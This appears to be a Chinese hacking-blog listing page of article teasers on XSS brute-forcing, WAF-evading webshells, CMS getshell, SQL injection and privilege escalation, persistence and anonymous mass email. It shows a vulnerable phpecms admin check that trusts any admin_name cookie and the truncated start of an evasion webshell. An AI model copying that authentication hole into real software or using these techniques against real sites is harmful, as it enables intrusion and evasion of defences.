秒杀安全狗神器

秒杀安全狗神器

XSS暴力破解神器 - BruteXSS

相信很多小伙伴都知道XSS测试,至于如何更加有效地插入载荷是一件重复性的高强度劳动工作,在此本文介绍了一款自动进行插入XSS,并且可以自定义攻击载荷。这些载荷从几十条到几百条甚至几千条。该脚本也同时包含了一些绕过各种WAF的语句。

PHPCMS V9最新版本后台设计缺陷导致getshell

0x01 背景

周末审计了下phpcms的最新版本,前台已经很难找到漏洞了,故看了看后台相关的代码,发现还是有一处可以拿shell的漏洞。由于默认安装后需要超级管理员权限,故该漏洞很鸡肋,但感觉应该会在其它cms中也存在,所以主要分享下挖掘思路~
PS:使用的测试环境是php5.6(已经移除gpc选项)

匿名邮件发送匿名批量发送

匿名邮件发送匿名批量发送

phpecms1.3 cookies欺骗漏洞进后台

phpecms1.3/admin/cms_check.php

<span class="php"><span class="hljs-meta">&lt;?php</span>
	<span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>($_COOKIE[<span class="hljs-string">'admin_name'</span>])){
		alert_href(<span class="hljs-string">'非法登录'</span>,<span class="hljs-string">'cms_login.php'</span>);
	};
<span class="hljs-meta">?&gt;</span></span>

判断如果没有admin_name的cookie就跳登录页面,如果admin_name就不跳了。

过D盾,安全狗,一句话

其他waf什么的自己测试

//过D盾过安全狗
 
<?php
error_reporting(0);
$b

ECSHOP /admin/affiliate_ck.php sql注入

ECSHOP /admin/affiliate_ck.php sql注入

Mysql代码执行漏洞,可本地提权(含exp)

Mysql代码执行漏洞,可本地提权(含exp)

虚拟主机提权的两个小技巧

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?


原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。


下面是个人的小技巧:


0x01: 是否大

维持权限的小脚本

分享一个瞎写的维持权限的小脚本,感觉有用就拿去